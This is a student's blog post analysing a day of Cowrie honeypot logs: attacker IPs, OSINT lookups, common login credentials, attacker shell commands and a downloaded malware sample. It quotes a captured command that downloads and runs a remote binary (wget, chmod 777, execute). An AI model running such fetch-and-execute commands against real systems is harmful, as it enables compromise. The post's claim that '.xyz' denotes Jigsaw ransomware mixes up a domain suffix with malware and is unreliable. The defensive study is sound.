Analysis of a Cowrie HoneyPot

What is a honeypot?

You might think of the Disney character Winnie the Pooh eating honey out of a honeypot. However, a honeypot means something different in the cybersecurity world. A honeypot observe and analyze what malicious activity occurred in a controlled and safe environment. Some honeypots attract and trap malicious attacks such as email traps and database traps. Honeypots are a valuable tool in cybersecurity because it allows cybersecurity professionals to learn about vulnerabilities and potential threats in a system. In this article, the focus will be on the honeypot: Cowrie.

Cowrie is a medium to highly interactive SSH and Telnet honeypot designed to record attacks performed by attackers on ports 22 and 23. The honeypot acts as an SSH server with weak login credentials. Once the attacker logins into the honeypot, they have access to a fake shell to execute commands.

For my final project, I used an AWS TPOT web interface to analyze malicious activity on the honeypot: Cowrie for a period of 1 day 8 hours (Oct 18, 2021 @ 10:00 to Oct 19, 2021@ 18:00) using a Debian EC2 instance located in Northern Virginia.

Here are my findings:

Figure 1. This figure shows the top 10 source IP attackers and top 10 command-line input used on the Cowrie honeypot.

Using Kabana to filter the data, the top attacker on this honeypot is the source IP address:78.110.67.48. The talointelligence webpage displays that this IP address is located in Manama, Bahrain, and is owned by LightSpeed Communications seen in Figure 2.

Figure 2. This Figure shows information associated with the source IP address: 78.110.67.48.

Next, I used the website IPvoid.com and found the following information: the address of the building, a name associated with the company, and a phone number seen in Figure 3.

Figure 3. This figure shows that the information about LightSpeed Communication https://www.ipvoid.com/whois/

Then, I used the website: brightcloud.com for threat analysis and found out this IP address threat status is benign. Interesting right?

Figure 4. This figure shows the IP address is not a threat. https://www.brightcloud.com/tools/url-ip-lookup.php
Figure 5. This figure shows the risk level of the search IP address.

Therefore, I search for LightSpeed Communication W.L.L on google. I found the following info about the company. The company has a website, the ownership status is acquired/merged, and the company provides internet service seen in Figure 6. I clicked on the link associated with this company. The link loads to the login page seen in Figure 7.

Figure 6. This figure shows information about LightSpeed Communication W.L.L https://pitchbook.com/profiles/company/63383-95#overview
Figure 7. This figure shows LightSpeed Communication W.L.L Login page. http://www.lightspeed.com.bh/

There are two different names associated with the company seen in Figure 8. I searched for the name of the Founder & Vice Chairman of the company and found an article talking about the company in 2007 (https://www.arabianbusiness.com/light-years-ahead-213242.html). I could not find anything about the name associated with LightSpeed Communication W.L.L seen in Figure 3. However, I found another website that states that LightSpeed Communication W.L.L dissolved seen in Figure 9.

Figure 8. This figure shows employees associated with LightSpeed Communication W.L.L. https://pitchbook.com/profiles/company/63383-95#team
Figure 9. This figure shows that LightSpeed Communication W.L.L dissolved. https://www.zawya.com/mena/en/company/Lightspeed_Communication_WLL-1003212/

Next, I analyze the username and passwords that attackers used to gain access to the Cowrie Honeypot. The results show that the most used username was root and the most used passwords were 1 and1qazXSW@. I made a horizontal stacked bar graph to visually show the top usernames and passwords seen in Figure 11.

Figure 10. This figure shows common passwords and usernames used on the Cowrie honeypot to gain access.

Now, it is time to analyze the attempted malicious activity on this honeypot.

Command-line Analysis

In Figure 1, the top attacker with the most activity on the honeypot was the IP address: 78.110.67.48. Therefore, I filtered the information to only show this IP address. This IP address uses the following commands shown seen in Figure 12.

First, the attacker tries to enable the shell built-in command and uses the command system to pass commands to a Unix shell. Second, the attacker tries to find information about the kernel data structure using the command cat /proc/mounts and installs Busybox HDKTE, a Swiss Amry Knife tool in Linux. Third, the attacker moves to a temporary file labeled shm and rename the folder /bin/echo to the folder, .s. Then, the attacker tries to transfer using the command TFTP and retrieve a file using a wget. Fourth, the attackers appends the command:dd bs=52 count=1 if=.s || while read i ; do echo $i; done into the .s folder. This command looks like a digital forensic command. Finally, the file .s is deleted and exits the shell.

However, this IP address did not upload a file on this honeypot.

Figure 12. The figure shows the following information such as the time and date of the attack, the eventid, geo_ip city name, geo_ip country name, and the command used filtered to the IP address 78.110.67.48

Malware Analysis

After the command-line analysis, I look at the malicious downloads on Cowrie Honeypot. The downloaded files were from the following IP addresses: 13.89.59.109, 68.183.180.46, 40.86.1.181 seen in Figure 13. In this section, the focus will be on the IP address 13.89.59.109.

Figure 13. This shows the IP addresses associated with downloading files onto the honeypot.

The IP address: 13.89.59.109 tried to upload an exploit on the honeypot. The command was wget drip-project.xyz/x86_64; chmod 777 *; ./x86_64 drip_payload seen in Figure 14.

Figure 14. This figure shows the top URI downloads on this honeypot.

First, I pasted the hash on the website virustotal and it indicated that this hash was malicious.

Figure 15. This figure shows that 35 vendors flagged this hash as malicious.

Next, I analyzed each part of the command. The first section of the command was wget drip-project.xyz/x86_64. The Linux command,wget, is used to retrieve files over the internet. The file (exploit)is drip-project.xyz and x86_64 refers to 64-bit software.

Figure 16. This figure shows that 35 vendors flagged this filename as malicious.

Upon further investigation, I found out that the extension .xyz is Jigsaw ransomware. Jigsaw ransomware encrypts various files stored on victims’ computers via asymmetric cryptography. If the encryption is successful, then .xyz ransomware opens a window that contains a ransom-demand message. The message informs victims of the encryption and demands a ransom payment to restore the files. It states that several files are deleted every 60 minutes. Finally, the website, virustotal.com, verifies that the file is malicious seen in Figure 16.

The second part of the command is chmod 777*. Chmod is a Linux command used to change permissions on a file and setting 777 permission to a file makes the file readable, writable, and executable by all users. Finally, the last part of the command is ./x86_64 drip_payload. The program was executed on the system.

I tried to retrieve this exploit onto my virtual machine (SIFT Workstation). However, the file was unable to retrieve it from the host seen in Figure 17.

Figure 17. This figure shows an unsuccessful retrieval of filename drip-project.xyz/x86_64.

Therefore, I used the following websites: abusedpIP.com and brightcloud.com to investigate this IP address. I found out the following for this IP address: the network owner is a Microsoft corporation, it is associated with Data/Center/Web Hosting/Transit, and is reported as a threat seen in Figures 18 and 19. However, I could not find a website to the business or a name associated with this IP address.

Figure 18. This figure shows this IP address reputation by using crowdsourced information to see what other people have reported from this IP address. https://www.abuseipdb.com/check/13.89.59.109
Figure 19. This figure shows this IP address is malicious. https://www.brightcloud.com/tools/url-ip-lookup.php

Conclusion

This is a perfect example of what cybersecurity professionals do on a daily basis. They investigate incidents and tried to find the story in order to find the reason behind the attack. What is the main goal? In this project, the story was about hackers from all over the worldwide trying to either break the honeypot by using various exploits. After they have identified the threat, cybersecurity professionals analyze the threat aka Indicator of compromise (IOC) by using various cybersecurity tools such as virus total and using websites to lookup IP addresses. In this project, I have done command-line analysis, malware analysis, and IP location analysis. Finally, they use this information to create policies, guidelines, procedures in their organization to build and improve their cybersecurity system. In this project, I would have recommended closing insecure ports, updating password policies, set up IDS/IPS to detect IP addresses not belonging to the network, etc. The possibilities are endless. Malicious attacks are inevitable in any system. The main objective of cybersecurity professional is to learn, prepare, defend, and recover against possible malicious attacks.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Dijah

Dijah

I'm transitioning from pre-med into the tech world specifically cybersecurity. I'm here to write about my journey into the tech space.